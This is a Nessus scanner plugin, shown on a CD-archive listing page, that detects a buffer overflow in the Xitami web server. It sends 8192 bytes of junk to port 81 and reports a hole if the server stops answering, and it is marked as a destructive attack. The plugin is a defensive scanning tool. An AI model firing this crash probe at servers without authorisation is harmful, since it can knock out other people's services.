home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / xitami_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  83 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
  7. #      Erik Anderson <eanders@carmichaelsecurity.com>
  8. #      Added a source reference link on www.securiteam.com
  9.  
  10. if(description)
  11. {
  12.  script_id(10322);
  13.  script_bugtraq_id(6599);
  14.  script_version ("$Revision: 1.12 $");
  15.  
  16.  name["english"] = "Xitami Web Server buffer overflow";
  17.  name["francais"] = "DΘpassement de buffer dans le serveur web Xitami";
  18.  script_name(english:name["english"], francais:name["francais"]);
  19.  
  20.  desc["english"] = "It is possible to make the remote web server execute
  21. arbitrary code by sending a lot of data on the remote
  22. TCP port 81.
  23.     
  24. This problem may allow an attacker to execute arbitrary code on
  25. the remote system or create a denial of service.
  26.  
  27. Solution : None at this time. Contact Xitami
  28.  
  29. Reference : http://www.securiteam.com/exploits/3F5QLPPQ1A.html
  30.  
  31. Risk factor : High";
  32.  
  33.  desc["francais"] = "Il est possible de faire executer du code arbitraire
  34. α un serveur faisant tourner Xitami en lui envoyant la
  35. commande suivante en lui envoyant beaucoup de donnΘes
  36. alΘatoires.
  37.     
  38. Ce problΦme peut permettre α un pirate d'executer du
  39. code arbitraire sur le systΦme distant, ou de mettre
  40. le systΦme hors-service.
  41.  
  42. Solution : Aucune. Utilisez un autre serveur web
  43. Facteur de risque : ElevΘ";
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Xitami buffer overflow";
  48.  summary["francais"] = "DΘpassement de buffer dans Xitami";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_DESTRUCTIVE_ATTACK);
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  55.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  56.  family["english"] = "Gain root remotely";
  57.  family["francais"] = "Passer root α distance";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_dependencie("find_service.nes");
  60.  script_require_ports(81);
  61.  exit(0);
  62. }
  63.  
  64. #
  65. # The script code starts here
  66. #
  67.  
  68.  
  69. port = 81;
  70. if(get_port_state(port))
  71. {
  72.  data = crap(8192);
  73.  soc = open_sock_tcp(port);
  74.  if(soc > 0)
  75.  {
  76.   send(socket:soc, data:data);
  77.   close(soc);
  78.   soc2 = open_sock_tcp(port);
  79.   if(!soc2)security_hole(port);
  80.   else close(soc2);
  81.  }
  82. }
  83.